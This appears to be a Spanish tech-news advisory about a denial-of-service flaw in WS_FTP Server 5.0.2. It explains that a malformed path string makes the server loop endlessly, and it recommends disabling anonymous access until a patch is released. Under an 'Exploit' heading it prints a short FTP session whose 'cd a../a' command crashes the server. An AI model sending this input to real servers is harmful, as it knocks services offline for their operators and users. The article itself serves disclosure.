WS_FTP es uno de los servidores FTP más conocidos del mercado debido en parte por su facilidad de uso y por su interfaz amigable.
Un problema en el procesamiento de direcciones de archivos, puede ser explotado por un atacante para provocar que el consumo de recursos de la CPU se eleve hasta el punto de causar una denegación del servicio en la máquina atacada. Para ello tendrá que enviar un comando continuado de una cadena de caracteres especialmente mal construida, con lo que conseguirá un bucle infinito que conseguirá hacer caer el servidor.
Para que el atacante pueda conseguir su objetivo ha necesitado autenticarse previamente ante el servidor. Si el servidor tiene el acceso anónimo habilitado facilitará notablemente la posibilidad de ataque. Es por ello que como medida preventiva se recomienda el restringir este tipo de accesos mientras sale un parche que evite este problema
Exploit:
E:>ftp localhost
Connected to ibm.
220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
220-Fri Aug 27 14:12:19 2004
220-29 days remaining on evaluation.
220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
User (ibm:(none)): ftp
331 Password required
Password:
230 user logged in
ftp> cd a../a
Connection closed by remote host.
Además de fakes news, en internet encontramos múltiples formas de desinformación: clonación de medios de…
Sin las medidas de protección necesarias, un almacén puede convertirse en el eslabón más débil…
Adyen publica los resultados de su estudio "Estrategias para reducir el coste total de pagos",…
Del porcentaje global del 21 % se baja a un 18 % en el caso…
Entrevistamos a John Shier, CTO Field de Sophos, que hace repaso de las principales amenazas…
Desde fibratel comparten una serie de pautas para orientar la construcción de centros de datos…